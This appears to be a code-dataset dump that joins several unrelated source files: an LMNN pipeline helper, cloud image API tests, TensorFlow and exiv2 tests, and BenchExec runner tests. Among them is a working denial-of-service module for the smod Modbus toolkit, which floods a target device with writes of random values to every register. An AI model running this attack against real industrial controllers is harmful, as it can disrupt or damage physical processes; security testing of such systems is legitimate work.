>>> print(lmnn_pipe.score(X_test, y_test))
0.971428571429
"""
memory = kwargs.pop('memory', None)
if kwargs:
raise TypeError('Unknown keyword arguments: "{}"'
.format(list(kwargs.keys())[0]))
lmnn = LargeMarginNearestNeighbor(
n_neighbors=n_neighbors, n_components=n_components, init=init,
warm_start=warm_start, max_impostors=max_impostors,
neighbors_params=neighbors_params, weight_push_loss=weight_push_loss,
impostor_store=impostor_store, max_iter=max_iter, tol=tol,
callback=callback, store_opt_result=store_opt_result, verbose=verbose,
random_state=random_state, n_jobs=n_jobs)
if n_neighbors_predict is None:
n_neighbors_predict = n_neighbors
if n_jobs_predict is None:
n_jobs_predict = n_jobs
knn = KNeighborsClassifier(
n_neighbors=n_neighbors_predict, weights=weights, algorithm=algorithm,
leaf_size=leaf_size, n_jobs=n_jobs_predict)
return Pipeline([('lmnn', lmnn), ('knn', knn)], memory=memory)
| bsd-3-clause | 7,088,095,768,476,751,000 | 37.836907 | 115 | 0.587134 | false | 4.153374 | false | false | false |
enddo/smod | Application/modules/modbus/dos/writeAllRegister.py | 1 | 2327 |
import os
import threading
import random
from System.Core.Global import *
from System.Core.Colors import *
from System.Core.Modbus import *
from System.Lib import ipcalc
down = False
class Module:
info = {
'Name': 'DOS Write All Register',
'Author': ['@enddo'],
'Description': ("DOS With Write All Register Function"),
}
options = {
'RHOST' :['' ,True ,'The target IP address'],
'RPORT' :[502 ,False ,'The port number for modbus protocol'],
'UID' :['' ,True ,'Modbus Slave UID.'],
'Threads' :[1 ,False ,'The number of concurrent threads'],
'Output' :[False ,False ,'The stdout save in output directory']
}
output = ''
def exploit(self):
moduleName = self.info['Name']
print bcolors.OKBLUE + '[+]' + bcolors.ENDC + ' Module ' + moduleName + ' Start'
for i in range(int(self.options['Threads'][0])):
if(self.options['RHOST'][0]):
thread = threading.Thread(target=self.do,args=(self.options['RHOST'][0],))
thread.start()
THREADS.append(thread)
else:
break
for thread in THREADS:
thread.join()
if(down):
self.printLine('[-] Modbus is not running on : ' + self.options['RHOST'][0],bcolors.WARNING)
break
if(self.options['Output'][0]):
open(mainPath + '/Output/' + moduleName + '_' + self.options['RHOST'][0].replace('/','_') + '.txt','a').write('='*30 + '\n' + self.output + '\n\n')
self.output = ''
def printLine(self,str,color):
self.output += str + '\n'
if(str.find('[+]') != -1):
print str.replace('[+]',color + '[+]' + bcolors.ENDC)
elif(str.find('[-]') != -1):
print str.replace('[-]',color + '[+]' + bcolors.ENDC)
else:
print str
def do(self,ip):
global down
for i in range(0xffff):
if(down):
break
c = connectToTarget(ip,self.options['RPORT'][0])
if(c == None):
down = True
return None
try:
self.printLine('[+] Write on Register Address ' + str(int(hex(i|0x1111),16)),bcolors.OKGREEN)
ans = c.sr1(ModbusADU(transId=getTransId(),unitId=int(self.options['UID'][0]))/ModbusPDU06_Write_Single_Register(registerAddr=int(hex(i|0x1111),16),registerValue=int(hex(random.randint(0,16**4-1)|0x1111),16)),timeout=timeout, verbose=0)
ans = ModbusADU_Answer(str(ans))
self.printLine('[+] Response is :',bcolors.OKGREEN)
ans.show()
except:
pass
| gpl-2.0 | 2,596,153,615,724,404,700 | 28.455696 | 240 | 0.619252 | false | 2.796875 | false | false | false |
hayderimran7/ec2-api | ec2api/tests/functional/api/test_images.py | 2 | 14762 |
# Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest_lib.common.utils import data_utils
import testtools
from ec2api.tests.functional import base
from ec2api.tests.functional import config
CONF = config.CONF
class ImageTest(base.EC2TestCase):
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_type(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual("ebs", image['RootDeviceType'],
"Image is not EBS image")
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_ebs_image_volume_properties(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertTrue(image['RootDeviceName'])
self.assertTrue(image['BlockDeviceMappings'])
device_name = image['RootDeviceName']
bdm = image['BlockDeviceMappings']
bdm = [v for v in bdm if v['DeviceName'] == device_name]
self.assertEqual(1, len(bdm))
bdm = bdm[0]
self.assertIn('Ebs', bdm)
ebs = bdm['Ebs']
self.assertIsNotNone(ebs.get('SnapshotId'))
self.assertIsNotNone(ebs.get('DeleteOnTermination'))
self.assertIsNotNone(ebs.get('VolumeSize'))
if CONF.aws.run_incompatible_tests:
self.assertIsNotNone(ebs.get('Encrypted'))
self.assertFalse(ebs.get('Encrypted'))
self.assertIsNotNone(ebs.get('VolumeType'))
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_describe_image_with_filters(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
data = self.client.describe_images(
# NOTE(ft): limit output to prevent timeout over AWS
Filters=[{'Name': 'image-type', 'Values': ['kernel', 'ramdisk']}])
if len(data['Images']) < 2:
self.skipTest("Insufficient images to check filters")
data = self.client.describe_images(
Filters=[{'Name': 'image-id', 'Values': [image_id]}])
self.assertEqual(1, len(data['Images']))
self.assertEqual(image_id, data['Images'][0]['ImageId'])
def test_check_image_operations_negative(self):
# NOTE(andrey-mp): image_id is a public image created by admin
image_id = CONF.aws.image_id
self.assertRaises('InvalidRequest',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('AuthFailure',
self.client.describe_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='unsupported')
self.assertRaises('InvalidParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='blockDeviceMapping')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id)
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, Description={'Value': 'fake'})
self.assertRaises('AuthFailure',
self.client.modify_image_attribute,
ImageId=image_id, LaunchPermission={'Add': [{'Group': 'all'}]})
self.assertRaises('MissingParameter',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='description')
self.assertRaises('InvalidParameterCombination',
self.client.modify_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('InvalidRequest',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='fake')
self.assertRaises('AuthFailure',
self.client.reset_image_attribute,
ImageId=image_id, Attribute='launchPermission')
self.assertRaises('AuthFailure',
self.client.deregister_image,
ImageId=image_id)
@testtools.skipUnless(CONF.aws.image_id, 'image id is not defined')
def test_create_image_from_non_ebs_instance(self):
image_id = CONF.aws.image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
if 'RootDeviceType' in image and 'ebs' in image['RootDeviceType']:
raise self.skipException('image_id should not be EBS image.')
instance_id = self.run_instance(ImageId=image_id)
def _rollback(fn_data):
self.client.deregister_image(ImageId=fn_data['ImageId'])
self.assertRaises('InvalidParameterValue',
self.client.create_image, rollback_fn=_rollback,
InstanceId=instance_id, Name='name', Description='desc')
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
def _create_image(self, name, desc, extra_run_instance_args={}):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
self.assertTrue('RootDeviceType' in image
and 'ebs' in image['RootDeviceType'])
instance_id = self.run_instance(ImageId=image_id,
**extra_run_instance_args)
instance = self.get_instance(instance_id)
for bdm in instance.get('BlockDeviceMappings', []):
if 'Ebs' in bdm:
self.addResourceCleanUp(self.client.delete_volume,
VolumeId=bdm['Ebs']['VolumeId'])
data = self.client.create_image(InstanceId=instance_id,
Name=name, Description=desc)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.get_image_waiter().wait_available(image_id)
data = self.client.describe_images(ImageIds=[image_id])
for bdm in data['Images'][0].get('BlockDeviceMappings', []):
if 'Ebs' in bdm and 'SnapshotId' in bdm['Ebs']:
snapshot_id = bdm['Ebs']['SnapshotId']
self.addResourceCleanUp(self.client.delete_snapshot,
SnapshotId=snapshot_id)
data = self.client.terminate_instances(InstanceIds=[instance_id])
self.get_instance_waiter().wait_delete(instance_id)
return image_id, image_clean
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_create_image_from_ebs_instance(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertIsNotNone(image['CreationDate'])
self.assertEqual("ebs", image['RootDeviceType'])
self.assertFalse(image['Public'])
self.assertEqual(name, image['Name'])
self.assertEqual(desc, image['Description'])
self.assertEqual('machine', image['ImageType'])
self.assertNotEmpty(image['BlockDeviceMappings'])
for bdm in image['BlockDeviceMappings']:
self.assertIn('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_simple_image_attributes(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='kernel')
self.assertIn('KernelId', data)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='ramdisk')
self.assertIn('RamdiskId', data)
# description
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertIn('Description', data)
self.assertIn('Value', data['Description'])
self.assertEqual(desc, data['Description']['Value'])
def _modify_description(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='description')
self.assertEqual(new_desc, data['Description']['Value'])
new_desc = data_utils.rand_name('new desc')
_modify_description(Attribute='description', Value=new_desc)
_modify_description(Description={'Value': new_desc})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_bdm_in_image(self):
image_id = CONF.aws.ebs_image_id
data = self.client.describe_images(ImageIds=[image_id])
root_device_name = data['Images'][0]['RootDeviceName']
device_name_prefix = base.get_device_name_prefix(root_device_name)
device_name = device_name_prefix + 'h'
name = data_utils.rand_name('image')
desc = data_utils.rand_name('description')
image_id, image_clean = self._create_image(
name, desc,
extra_run_instance_args={
'BlockDeviceMappings': [{'DeviceName': device_name,
'Ebs': {'VolumeSize': 1}}]})
data = self.client.describe_images(ImageIds=[image_id])
image = data['Images'][0]
for bdm in image['BlockDeviceMappings']:
self.assertTrue('DeviceName', bdm)
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'By default glance is configured as "publicize_image": "role:admin"')
@testtools.skipUnless(CONF.aws.run_incompatible_tests,
'skip due to bug #1439819')
@testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
def test_check_launch_permission_attribute(self):
name = data_utils.rand_name('image')
desc = data_utils.rand_name('desc for image')
image_id, image_clean = self._create_image(name, desc)
# launch permission
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertEmpty(data['LaunchPermissions'])
def _modify_launch_permission(**kwargs):
self.client.modify_image_attribute(ImageId=image_id, **kwargs)
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertIn('LaunchPermissions', data)
self.assertNotEmpty(data['LaunchPermissions'])
self.assertIn('Group', data['LaunchPermissions'][0])
self.assertEqual('all', data['LaunchPermissions'][0]['Group'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertTrue(data['Images'][0]['Public'])
self.client.reset_image_attribute(
ImageId=image_id, Attribute='launchPermission')
data = self.client.describe_image_attribute(
ImageId=image_id, Attribute='launchPermission')
self.assertEmpty(data['LaunchPermissions'])
data = self.client.describe_images(ImageIds=[image_id])
self.assertFalse(data['Images'][0]['Public'])
_modify_launch_permission(Attribute='launchPermission',
OperationType='add', UserGroups=['all'])
_modify_launch_permission(LaunchPermission={'Add': [{'Group': 'all'}]})
data = self.client.deregister_image(ImageId=image_id)
self.cancelResourceCleanUp(image_clean)
class ImageRegisterTest(base.EC2TestCase):
valid_image_state = set(('available', 'pending', 'failed'))
@classmethod
@base.safe_setup
def setUpClass(cls):
super(ImageRegisterTest, cls).setUpClass()
cls.image_location = CONF.aws.ami_image_location
if not cls.image_location:
raise cls.skipException('Image materials are not ready in S3')
def test_register_get_deregister_ami_image(self):
image_name = data_utils.rand_name("ami-name")
data = self.client.register_image(
Name=image_name, ImageLocation=self.image_location)
image_id = data['ImageId']
image_clean = self.addResourceCleanUp(self.client.deregister_image,
ImageId=image_id)
self.assertEqual(image_id[0:3], "ami")
data = self.client.describe_images(ImageIds=[image_id])
self.assertEqual(1, len(data['Images']))
image = data['Images'][0]
self.assertEqual(image_name, image['Name'])
self.assertEqual(image_id, image['ImageId'])
self.assertIn(image['State'], self.valid_image_state)
self.get_image_waiter().wait_available(image_id)
self.client.deregister_image(ImageId=image_id)
self.assertRaises('InvalidAMIID.NotFound',
self.client.describe_images,
ImageIds=[image_id])
self.cancelResourceCleanUp(image_clean)
| apache-2.0 | 8,902,283,319,252,786,000 | 42.417647 | 79 | 0.628641 | false | 3.985421 | true | false | false |
AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/tensor_forest/hybrid/python/hybrid_layer_test.py | 158 | 2156 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class HybridLayerTest(test_util.TensorFlowTestCase):
def setUp(self):
self.params = tensor_forest.ForestHParams(
num_classes=3,
num_features=7,
layer_size=11,
num_layers=13,
num_trees=17,
connection_probability=0.1,
hybrid_tree_depth=4,
regularization_strength=0.01,
regularization="",
weight_init_mean=0.0,
weight_init_std=0.1)
self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)
def testLayerNums(self):
l1 = fully_connected.FullyConnectedLayer(self.params, 0, None)
self.assertEquals(l1.layer_num, 0)
l2 = fully_connected.FullyConnectedLayer(self.params, 1, None)
self.assertEquals(l2.layer_num, 1)
l3 = fully_connected.FullyConnectedLayer(self.params, 2, None)
self.assertEquals(l3.layer_num, 2)
if __name__ == "__main__":
googletest.main()
| apache-2.0 | -4,702,249,139,691,213,000 | 35.542373 | 81 | 0.699443 | false | 3.843137 | true | false | false |
AlienCowEatCake/ImageViewer | src/ThirdParty/Exiv2/exiv2-0.27.3-Source/tests/bugfixes/redmine/test_issue_1058.py | 3 | 1394 |
# -*- coding: utf-8 -*-
import system_tests
@system_tests.CopyFiles("$data_path/exiv2-empty.jpg")
class CheckXmlLang(metaclass=system_tests.CaseMeta):
url = "http://dev.exiv2.org/issues/1058"
filename = system_tests.path("$data_path/exiv2-empty_copy.jpg")
commands = [
## Add titles in 2 languages and one default
"""$exiv2 -M"set Xmp.dc.title lang=de-DE GERMAN" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=en-GB BRITISH" $filename""",
"""$exiv2 -M"set Xmp.dc.title Everybody else" $filename""",
"""$exiv2 -px $filename""",
## Remove languages, test case for the language
"""$exiv2 -M"set Xmp.dc.title lang=DE-de german" $filename""",
"""$exiv2 -M"set Xmp.dc.title lang=EN-gb" $filename""",
"""$exiv2 -M"set Xmp.dc.title" $filename""",
"""$exiv2 -px $filename""",
]
stdout = [
"",
"",
"",
"""Xmp.dc.title LangAlt 3 lang="x-default" Everybody else, lang="en-GB" BRITISH, lang="de-DE" GERMAN
""",
"",
"",
"",
"""Xmp.dc.title LangAlt 1 lang="de-DE" german
""",
]
stderr = [""] * len(commands)
retval = [0] * len(commands)
| gpl-3.0 | 9,075,416,117,488,455,000 | 35.684211 | 145 | 0.479914 | false | 3.375303 | false | false | false |
ultimate-pa/benchexec | benchexec/test_runexecutor.py | 1 | 43124 |
# This file is part of BenchExec, a framework for reliable benchmarking:
# https://github.com/sosy-lab/benchexec
#
# SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
#
# SPDX-License-Identifier: Apache-2.0
import contextlib
import logging
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import shutil
from benchexec import container
from benchexec import containerexecutor
from benchexec import filehierarchylimit
from benchexec.runexecutor import RunExecutor
from benchexec import runexecutor
from benchexec import util
sys.dont_write_bytecode = True # prevent creation of .pyc files
here = os.path.dirname(__file__)
base_dir = os.path.join(here, "..")
bin_dir = os.path.join(base_dir, "bin")
runexec = os.path.join(bin_dir, "runexec")
trivial_run_grace_time = 0.2
class TestRunExecutor(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.longMessage = True
cls.maxDiff = None
logging.disable(logging.NOTSET) # need to make sure to get all messages
if not hasattr(cls, "assertRegex"):
cls.assertRegex = cls.assertRegexpMatches
def setUp(self, *args, **kwargs):
with self.skip_if_logs(
"Cannot reliably kill sub-processes without freezer cgroup"
):
self.runexecutor = RunExecutor(use_namespaces=False, *args, **kwargs)
@contextlib.contextmanager
def skip_if_logs(self, error_msg):
"""A context manager that automatically marks the test as skipped if SystemExit
is thrown and the given error message had been logged with level ERROR."""
# Note: assertLogs checks that there is at least one log message of given level.
# This is not what we want, so we just rely on one debug message being present.
try:
with self.assertLogs(level=logging.DEBUG) as log:
yield
except SystemExit as e:
if any(
record.levelno == logging.ERROR and record.msg.startswith(error_msg)
for record in log.records
):
self.skipTest(e)
raise e
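    # Note for readers (comment added for clarity): self.skipTest() raises
    # unittest.SkipTest, so when the expected ERROR message was logged the
    # SystemExit from RunExecutor is effectively converted into a skipped
    # test; otherwise the final `raise e` re-raises the original SystemExit.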
def execute_run(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
result = self.runexecutor.execute_run(list(args), output_filename, **kwargs)
output = os.read(output_fd, 4096).decode()
finally:
os.close(output_fd)
os.remove(output_filename)
self.check_result_keys(result, "terminationreason")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--no-container",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run_extern(self, *args, expect_terminationreason=None, **kwargs):
(output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
try:
runexec_output = subprocess.check_output(
args=self.get_runexec_cmdline(*args, output_filename=output_filename),
stderr=subprocess.DEVNULL,
universal_newlines=True,
**kwargs,
)
output = os.read(output_fd, 4096).decode()
except subprocess.CalledProcessError as e:
print(e.output)
raise e
finally:
os.close(output_fd)
os.remove(output_filename)
result = {
key.strip(): value.strip()
for (key, _, value) in (
line.partition("=") for line in runexec_output.splitlines()
)
}
self.check_result_keys(result, "terminationreason", "returnvalue")
if isinstance(expect_terminationreason, list):
self.assertIn(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
else:
self.assertEqual(
result.get("terminationreason"),
expect_terminationreason,
"Unexpected terminationreason, output is \n" + output,
)
return (result, output.splitlines())
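    # Note for readers (comment added for clarity): runexec prints its results
    # as key=value lines, e.g. "walltime=1.234s" or "terminationreason=failed";
    # the dict comprehension above turns that output into
    # {"walltime": "1.234s", "terminationreason": "failed", ...} so it can be
    # checked in the same way as the in-process results.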
def check_command_in_output(self, output, cmd):
self.assertEqual(output[0], cmd, "run output misses executed command")
def check_result_keys(self, result, *additional_keys):
expected_keys = {
"cputime",
"walltime",
"memory",
"exitcode",
"cpuenergy",
"blkio-read",
"blkio-write",
"starttime",
}
expected_keys.update(additional_keys)
for key in result.keys():
if key.startswith("cputime-cpu"):
self.assertRegex(
key,
"^cputime-cpu[0-9]+$",
f"unexpected result entry '{key}={result[key]}'",
)
elif key.startswith("cpuenergy-"):
self.assertRegex(
key,
"^cpuenergy-pkg[0-9]+-(package|core|uncore|dram|psys)$",
f"unexpected result entry '{key}={result[key]}'",
)
else:
self.assertIn(
key,
expected_keys,
f"unexpected result entry '{key}={result[key]}'",
)
def check_exitcode(self, result, exitcode, msg=None):
self.assertEqual(result["exitcode"].raw, exitcode, msg)
def check_exitcode_extern(self, result, exitcode, msg=None):
exitcode = util.ProcessExitCode.from_raw(exitcode)
if exitcode.value is not None:
self.assertEqual(int(result["returnvalue"]), exitcode.value, msg)
else:
self.assertEqual(int(result["exitsignal"]), exitcode.signal, msg)
def test_command_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(_, output) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_command_error_output(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
def execute_Run_intern(*args, **kwargs):
(error_fd, error_filename) = tempfile.mkstemp(".log", "error_", text=True)
try:
(_, output_lines) = self.execute_run(
*args, error_filename=error_filename, **kwargs
)
error_lines = os.read(error_fd, 4096).decode().splitlines()
return (output_lines, error_lines)
finally:
os.close(error_fd)
os.remove(error_filename)
(output_lines, error_lines) = execute_Run_intern(
"/bin/sh", "-c", "/bin/echo ERROR_TOKEN >&2"
)
self.assertEqual(
error_lines[-1], "ERROR_TOKEN", "run error output misses command output"
)
for line in output_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
(output_lines, error_lines) = execute_Run_intern("/bin/echo", "OUT_TOKEN")
self.check_command_in_output(output_lines, "/bin/echo OUT_TOKEN")
self.check_command_in_output(error_lines, "/bin/echo OUT_TOKEN")
self.assertEqual(
output_lines[-1], "OUT_TOKEN", "run output misses command output"
)
for line in output_lines[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
for line in error_lines[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run error output")
def test_command_result(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, _) = self.execute_run("/bin/echo", "TEST_TOKEN")
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="walltime of /bin/echo not as expected",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/echo not as expected",
)
self.check_result_keys(result)
def test_wrong_command(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
def test_wrong_command_extern(self):
        (result, _) = self.execute_run_extern(
"/does/not/exist", expect_terminationreason="failed"
)
def test_cputime_hardlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_softlimit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs(
"Soft time limit cannot be specified without cpuacct cgroup"
):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
4,
delta=3,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_walltime_limit(self):
if not os.path.exists("/bin/sleep"):
self.skipTest("missing /bin/sleep")
(result, output) = self.execute_run(
"/bin/sleep", "10", walltimelimit=1, expect_terminationreason="walltime"
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
4,
delta=3,
msg="walltime is not approximately the time after which the process should have been killed",
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg="cputime of /bin/sleep is not approximately zero",
)
self.check_command_in_output(output, "/bin/sleep 10")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_cputime_walltime_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
hardtimelimit=1,
walltimelimit=5,
expect_terminationreason="cputime",
)
self.check_exitcode(result, 9, "exit code of killed process is not 9")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_all_timelimits(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
softtimelimit=1,
hardtimelimit=2,
walltimelimit=5,
expect_terminationreason="cputime-soft",
)
self.check_exitcode(result, 15, "exit code of killed process is not 15")
self.assertAlmostEqual(
result["walltime"],
1.4,
delta=0.5,
msg="walltime is not approximately the time after which the process should have been killed",
)
self.assertAlmostEqual(
result["cputime"],
1.4,
delta=0.5,
msg="cputime is not approximately the time after which the process should have been killed",
)
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_devnull(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_input_is_redirected_from_file(self):
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
with tempfile.TemporaryFile() as tmp:
tmp.write(b"TEST_TOKEN")
tmp.flush()
tmp.seek(0)
(result, output) = self.execute_run("/bin/cat", stdin=tmp, walltimelimit=1)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertAlmostEqual(
result["walltime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
)
if "cputime" in result: # not present without cpuacct cgroup
self.assertAlmostEqual(
result["cputime"],
trivial_run_grace_time,
delta=trivial_run_grace_time,
msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
)
self.check_result_keys(result)
self.check_command_in_output(output, "/bin/cat")
